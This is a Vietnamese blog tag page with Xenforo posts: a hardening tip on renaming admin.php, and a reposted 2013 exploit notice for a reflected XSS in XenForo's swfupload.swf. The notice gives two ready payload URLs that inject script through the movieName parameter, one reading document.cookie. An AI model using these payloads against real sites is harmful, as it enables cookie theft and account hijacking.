Hiển thị các bài đăng có nhãn Xenforo. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Xenforo. Hiển thị tất cả bài đăng

Thứ Hai, 28 tháng 7, 2014

Thay đổi AdminCP mặc định trong Xenforo


Một trong những biện pháp cơ bản để bảo mật cho Xenforo là việc thay đổi AdminCP - mặc định là admin.php

Nếu như trong vBulletin bạn chỉ cần đổi tên thư mục AdminCP và sửa lại trong config.php thì bên Xenforo lại rắc rối hơn một chút. Bài viết này sẽ hướng dẫn cụ thể.

READ MORE »

Thứ Bảy, 19 tháng 1, 2013

XSS vul in Xenforo CMS

Title: XSS vul in Xenforo CMS.

Author: Darksnipper

CMS Link: www.xenforo.com
vul type: XSS.

VUL concept:
http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/js/swfupload/Flash/swfupload.swf?movieName=< s c ri pt> alert("halo") < / script >

Greetz: Dream.killer,ErrorHaxor,Soul~inj3ctor,x30-1337,Dr.v!ru$,Dr.z0mbie,soldier OfGod,shadow008,P4k c4mmand3r,Dark knight,Pak Cyber Army,3xp1r3 CyberArmy,Kashmir Cyber Army

Or read here:
http://www.exploit4arab.com/exploits/321